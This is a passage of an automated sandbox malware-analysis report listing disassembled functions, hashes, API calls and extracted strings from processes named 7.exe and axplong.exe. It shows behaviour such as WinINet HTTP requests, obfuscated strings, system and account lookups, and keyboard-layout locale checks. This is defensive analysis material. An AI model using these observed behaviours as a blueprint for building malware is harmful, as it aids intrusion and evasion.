Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5830000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b90d4cb66e44a985ceee31de6a0abcfe369afef910bb3d811a391384b11793c3
Instruction ID: d18eab0de73dd7e068111e82e08652804707c8c886b6101bafadbf027c840c5d
Opcode Fuzzy Hash: b90d4cb66e44a985ceee31de6a0abcfe369afef910bb3d811a391384b11793c3
Instruction Fuzzy Hash: 62B14170E002099FDB24CFA9D886BADBBF2BF48714F148529D815E7294EB749D46CF81

Function 0583E0AF Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1597140444.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5830000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a6210143b69576b3726bd791e5257290c227b9a610674302a3d3e737360587
Instruction ID: 9f35d3507b417b910b8adcb857a29f17cf8dd8411c63d15d852cba8dcabaebc3
Opcode Fuzzy Hash: 37a6210143b69576b3726bd791e5257290c227b9a610674302a3d3e737360587
Instruction Fuzzy Hash: 92E1D635D2075A8ECB10FF64D950699B7B2FF95300F20CB9AD1097B254EB70AAD9CB81

Function 0120DC74 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1585662342.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1200000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0454e41c96f99fb3195241ba1c834339fbcadc22e3162f8707a69a180b089e1
Instruction ID: 74c1c3c6bb9be8aa46fec203d883e2ad61b08f00d3e5418bd47f7150f0578e24
Opcode Fuzzy Hash: d0454e41c96f99fb3195241ba1c834339fbcadc22e3162f8707a69a180b089e1
Instruction Fuzzy Hash: A2A17436E1021ACFCF16DFB4C5805EEBBB2FF84300B15466AE905AB296DB71D955CB80

Function 0583E0E8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1597140444.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5830000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f35c75f0705ef9c97c222f4c0892d0df929e19f283d94be404707abde1644ebe
Instruction ID: 8c31fef49b8cead58a934b8b1ccd34859d420aafb87c2f801f7267107fa0dc65
Opcode Fuzzy Hash: f35c75f0705ef9c97c222f4c0892d0df929e19f283d94be404707abde1644ebe
Instruction Fuzzy Hash: D1D1C435D2075A8ADB10EF64D950699F7B2FF95200F20CB9AD1097B214FB70AAD9CB81

Function 05210007 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1595431543.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5210000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff592e9e2df56f13c4327ca3f57e73e14381b7f424a5aec5f733b0516c169756
Instruction ID: ca50ebb8f52e62e7e163952913bb6f0c1fa57d549828098981ab9c54079f1a0b
Opcode Fuzzy Hash: ff592e9e2df56f13c4327ca3f57e73e14381b7f424a5aec5f733b0516c169756
Instruction Fuzzy Hash: FDC127B58227458BF710CF24E85A2893FB6BB81324F924709E2616B2E1DFB414CACF44

Function 05835630 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1597140444.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5830000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bd023c5bc26bbc8f9f8099ac6c598521f63bb28d2d521d16a885544f71a594c
Instruction ID: a5d659092bd306ef974d0c8bd748c119e92573d7fa29fcb204b67785cc726981
Opcode Fuzzy Hash: 2bd023c5bc26bbc8f9f8099ac6c598521f63bb28d2d521d16a885544f71a594c
Instruction Fuzzy Hash: AC913A70E003099FDB24CFA9D9967AEBBF2BF48314F148529E805E7294EB749D45CB81

Function 06D41500 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69426804137c96c61ccc2c11915d79ab0133bf23daf7186f88a6da1b1bfc2980
Instruction ID: b06f6c77645afdd667e2ad9d6904f5da2cbe132246bb35c36c1136d65474ca79
Opcode Fuzzy Hash: 69426804137c96c61ccc2c11915d79ab0133bf23daf7186f88a6da1b1bfc2980
Instruction Fuzzy Hash: 7A91C570E012288FDB68DF69C851B9EBBB2BF89300F1081AAD41DB7254DB355E85CF51

Function 06D45C40 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 248d01bf2ef58230d739555cff151d28fe8722b12301fa440090d13ef90e83e3
Instruction ID: 97991acd1f956031999a2001650c7be7aa9ec458f56700307b0c405fda4f3f4c
Opcode Fuzzy Hash: 248d01bf2ef58230d739555cff151d28fe8722b12301fa440090d13ef90e83e3
Instruction Fuzzy Hash: 6C91C370D012288BEB68DF69C851BDEBBB2BF88300F1081EAD51DAB254DB355E85CF54

Function 06D4145D Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1598845560.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6d40000_1Vkf7silOj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 642114df68a5100fc35e8707f9800546ac1e55d0230f9185568471f9855fd10c
Instruction ID: fb17724cf9549825edde80728f3f55dfd2cddc8f0dcb549e630f5671722f530a
Opcode Fuzzy Hash: 642114df68a5100fc35e8707f9800546ac1e55d0230f9185568471f9855fd10c
Instruction Fuzzy Hash: 6EF0C270D44219CFEB64AF54D8487BDBBB0AF0A389F106569D15A73590CB748AC8CFC8

Analysis Process: 7.exePID: 7884, Parent PID: 6620COMMON

Executed Functions

Function 05620B32 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1637672457.0000000005620000.00000040.00001000.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5620000_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d01dcd81b690fcc48a7abc9d9c249de66430505d61317971dab2fc6dc91050
Instruction ID: fc2fcf572f8ba19d8741a4b88318fee6c4f6a6fab82af9c5238bcc884ea54de1
Opcode Fuzzy Hash: e6d01dcd81b690fcc48a7abc9d9c249de66430505d61317971dab2fc6dc91050
Instruction Fuzzy Hash: F8117DE724C830FE5112D4454A4DAFA6A9FE2D73717304016F40FD6A02E2A6454BD971

Function 05620B50 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1637672457.0000000005620000.00000040.00001000.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5620000_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de25f12b448fca6b47a8422352b53157bd5cf0a39fd219f6f4871a415de77fab
Instruction ID: 93d30e74e90954e4e0b6f4ec93d6caa6f6a975dd8ababb5ef5129538b6b54bff
Opcode Fuzzy Hash: de25f12b448fca6b47a8422352b53157bd5cf0a39fd219f6f4871a415de77fab
Instruction Fuzzy Hash: 3E11ABEB24C830FE9112D8414A4DAFA6AAFE2DB3717304016F40BD6A01D2A64647D971

Function 05620B84 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1637672457.0000000005620000.00000040.00001000.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5620000_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72af482211eed3a3129f1db619951018253a39a4bc10e3fe4781ef4a59523c53
Instruction ID: 9240b15fd80066a55e3564b4cc094815b358e891352a0572fc69b71ffc6731f8
Opcode Fuzzy Hash: 72af482211eed3a3129f1db619951018253a39a4bc10e3fe4781ef4a59523c53
Instruction Fuzzy Hash: C0012BEB24C430FEA00684415B4DAF96A9FE79B3717304402F40FD5A0291E60A47D972

Function 05620B74 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1637672457.0000000005620000.00000040.00001000.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5620000_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0864b8f51f8826835fe1586eb792e1fdf882522fd31a34ff50793f7e6f3d97f8
Instruction ID: 9a284a88fd435ceb22f8127013c017548dc99cade26c8c6e1bfcdd03bf7f0056
Opcode Fuzzy Hash: 0864b8f51f8826835fe1586eb792e1fdf882522fd31a34ff50793f7e6f3d97f8
Instruction Fuzzy Hash: 5A012BE724C830FEA046C9465B4DAF97A6FE6A73717304402F40FD5A02D2E60A57DA71

Function 05620C02 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1637672457.0000000005620000.00000040.00001000.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5620000_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9778046dc828e5fc58b673faa2fbc44d53cbd450d598a2eca4b78453e8f468a
Instruction ID: b5828636061bb8900eb8eda38d4b4233b7d832084ae82234547186d7a1e53385
Opcode Fuzzy Hash: e9778046dc828e5fc58b673faa2fbc44d53cbd450d598a2eca4b78453e8f468a
Instruction Fuzzy Hash: 5A0126EA24C830FE9106D555574EBF6AF9FE79A3717304003F50BD8A01D2A6064BE961

Function 05620BAF Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1637672457.0000000005620000.00000040.00001000.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5620000_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d89c4f57f224ff1da37ab9a5cb1f44e363f3a480d07822934d050ee447f0d90
Instruction ID: 1e1c301d3ea52d2b4415abb6e4cbb1dc641a533c401aa898942d00ec1313fa11
Opcode Fuzzy Hash: 7d89c4f57f224ff1da37ab9a5cb1f44e363f3a480d07822934d050ee447f0d90
Instruction Fuzzy Hash: 5901ABE324CA70FFC24286559A4DAF1BFAFF747330330004AF44B8950292B5055BDA32

Function 05620BDE Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1637672457.0000000005620000.00000040.00001000.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5620000_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa4af0f0c7be5594b61a89ccab16c5a6887888ad13b38929cbf2b4e7b558b4c
Instruction ID: cdb623f7bbaef5b510dd8cad1dde899c3dc1105281ca5542299f47e1b618c2cc
Opcode Fuzzy Hash: bfa4af0f0c7be5594b61a89ccab16c5a6887888ad13b38929cbf2b4e7b558b4c
Instruction Fuzzy Hash: 99F02BE7248830FED105D9559B4DAF6BFEFE7963707304002F50F98A0192BA0697E972

Analysis Process: axplong.exePID: 8080, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.3%
Total number of Nodes:	1892
Total number of Limit Nodes:	83

Executed Functions

Function 006BBD30 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00708D18,00000000,00000000,00000000,00000000), ref: 006BBDBD
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 006BBDE0
HttpOpenRequestA.WININET(?,00000000), ref: 006BBE2A
HttpSendRequestA.WININET(?,00000000), ref: 006BBEEB
InternetReadFile.WININET(?,?,000003FF,?), ref: 006BBF9C
InternetCloseHandle.WININET(?), ref: 006BC077
InternetCloseHandle.WININET(?), ref: 006BC07F
InternetCloseHandle.WININET(?), ref: 006BC087

Strings

9wGTaHilQw==, xrefs: 006BC2BB, 006BC513
StYMTE==, xrefs: 006BBE03
3q, xrefs: 006BE2CF
SbKm, xrefs: 006BD4E6
9wGTaLGWQy9=, xrefs: 006BC355
stoi argument out of range, xrefs: 006BE3CA
invalid stoi argument, xrefs: 006BE3D4

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 9wGTaHilQw==$9wGTaLGWQy9=$SbKm$StYMTE==$invalid stoi argument$stoi argument out of range$3q
API String ID: 688256393-690406462
Opcode ID: 9d87e2c712ff89c48ae078ae1420705cc2e5a38ca9363870d306ed9d8da72b35
Instruction ID: 1a595a528944024655a3b3826fb75167ab40fd7dafcabd57de34a3991a8b723e
Opcode Fuzzy Hash: 9d87e2c712ff89c48ae078ae1420705cc2e5a38ca9363870d306ed9d8da72b35
Instruction Fuzzy Hash: 83B1D1F1A001589BDB24CF28CC85BEEBB6AEF41314F5041ADF509A7292D7759AC0CF99

Function 006B6590 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 006B6630

Strings

SnPe LOj, xrefs: 006B664C
JHKlbU==, xrefs: 006B6781
HHQlbU==, xrefs: 006B66D8

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: HHQlbU==$JHKlbU==$SnPe LOj
API String ID: 1484870144-2237643154
Opcode ID: e45d1e8f4b29a1babfbed4c5b8ae74e44477d9d2bb813a75ba26257615699410
Instruction ID: d3b480021ee913190cb4952a3c85853c81ab65d918d4b11d8c1d7e6a85df1148
Opcode Fuzzy Hash: e45d1e8f4b29a1babfbed4c5b8ae74e44477d9d2bb813a75ba26257615699410
Instruction Fuzzy Hash: 2491B2F19001189BDB28DB28CC95BEDB77AEB45304F4045EDF51997282DA749BC4CFA8

Function 006CD2E8 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 006B23BE

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: f5dd78a1b063047e3b885dbb188dee36f8257519248ff4e0b1383cdf933b672d
Instruction ID: 13951a0fb79b946ef85d2c767f491c85b8a39611650e84f6a264daeb41b76fcd
Opcode Fuzzy Hash: f5dd78a1b063047e3b885dbb188dee36f8257519248ff4e0b1383cdf933b672d
Instruction Fuzzy Hash: 9E5168B1E0061ACBDB19CF58D881BEEBBB6FB48310F24C52AD515EB291D338A941CB54

Function 006C4690 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

Strings

NvF+, xrefs: 006C478D, 006C48BC, 006C4AAC, 006C4BDB
aSF2aA==, xrefs: 006C46E2
a9P=, xrefs: 006C6353, 006C6622
aRFZ, xrefs: 006C5467
NvB+, xrefs: 006C4746, 006C47BD, 006C4A65, 006C4ADC
9LFZ, xrefs: 006C54D2
R2Z, xrefs: 006C52ED
stoi argument out of range, xrefs: 006C4E7C
bcBZ, xrefs: 006C54AB
XvPZ, xrefs: 006C5373
bLTZ, xrefs: 006C539C
WMNZ, xrefs: 006C534A
WMxZ, xrefs: 006C53EE
Wb Z, xrefs: 006C5417
avBZ, xrefs: 006C53C5
wNZ, xrefs: 006C5321
246122658369, xrefs: 006C4F0A, 006C4F1D, 006C4F5F, 006C4F69, 006C54C4
Gl==, xrefs: 006C4CFD
SBZ, xrefs: 006C5440
LrTsKE==, xrefs: 006C5489
e76b71, xrefs: 006C5459

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
String ID: R2Z$ SBZ$ wNZ$246122658369$9LFZ$Gl==$LrTsKE==$NvB+$NvF+$WMNZ$WMxZ$Wb Z$XvPZ$a9P=$aRFZ$aSF2aA==$avBZ$bLTZ$bcBZ$e76b71$stoi argument out of range
API String ID: 3545240790-383584070
Opcode ID: 78cc5060bb6d25f4e6d103bfa78e51427a6c17a7e38a15cd8adf9d81786f8820
Instruction ID: 047fbc2fa825441298a2057d1ea8d34b6f17bb08c37a157c827953611af06db4
Opcode Fuzzy Hash: 78cc5060bb6d25f4e6d103bfa78e51427a6c17a7e38a15cd8adf9d81786f8820
Instruction Fuzzy Hash: 0C23F3B1A002588BEB19DB28CD99BADBB77DB81304F5481DCE009AB2C2DB755FC48F55

Function 006B5DD0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000419, xrefs: 006B5F88
0000043f, xrefs: 006B601B
00000422, xrefs: 006B5FB9
Keyboard Layout\Preload, xrefs: 006B5F44
00000423, xrefs: 006B5FEA

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: e56153daba73fa8160254d57425d6511fce20e89e5bfb46966c4781e48f1dcdf
Instruction ID: db2ff1b9afcc9db0ba9df8b58b801da61ac0a213d18b34c4e77a9de60e0b4e9f
Opcode Fuzzy Hash: e56153daba73fa8160254d57425d6511fce20e89e5bfb46966c4781e48f1dcdf
Instruction Fuzzy Hash: 9CE1A1B1900258AFDB24DBA4CC89BEEB7BAEB14304F5042D9E509A7291D7749BC4CF51

Function 006B7CE0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 006B7E83

Strings

K9prKk==, xrefs: 006B80EA
K9pqMU==, xrefs: 006B8042
K9pqLk==, xrefs: 006B8192

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000096F000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000099B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009A6000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.00000000009B3000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3791789408.00000000009B4000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792519834.0000000000B45000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3792597928.0000000000B47000.00000080.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6b0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: K9pqLk==$K9pqMU==$K9prKk==
API String ID: 1721193555-747669196
Opcode ID: c0da0725fb60b1bdea0cd6f2d3695bb0c812a604fae187411785e46b6be726b5
Instruction ID: d2712cfa72d754ce0e0344895f1997f1c282d726627e528124197ea685348958
Opcode Fuzzy Hash: c0da0725fb60b1bdea0cd6f2d3695bb0c812a604fae187411785e46b6be726b5
Instruction Fuzzy Hash: 4DD1F3B0E006049BDF14AB2CDD5A7ED7B67AB82310F94429CE4156B3C2DB785ED18BC6

Function 006E6DE1 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 006E6E03
GetFileInformationByHandle.KERNEL32(?,?), ref: 006E6E5D
__dosmaperr.LIBCMT ref: 006E6EF2

Part of subcall function 006E7157: __dosmaperr.LIBCMT ref: 006E718C

Memory Dump Source

Source File: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true

Associated: 0000000A.00000002.3789210098.00000000006B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3789339171.0000000000712000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790159514.0000000000719000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.000000000071B000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmpDownload File
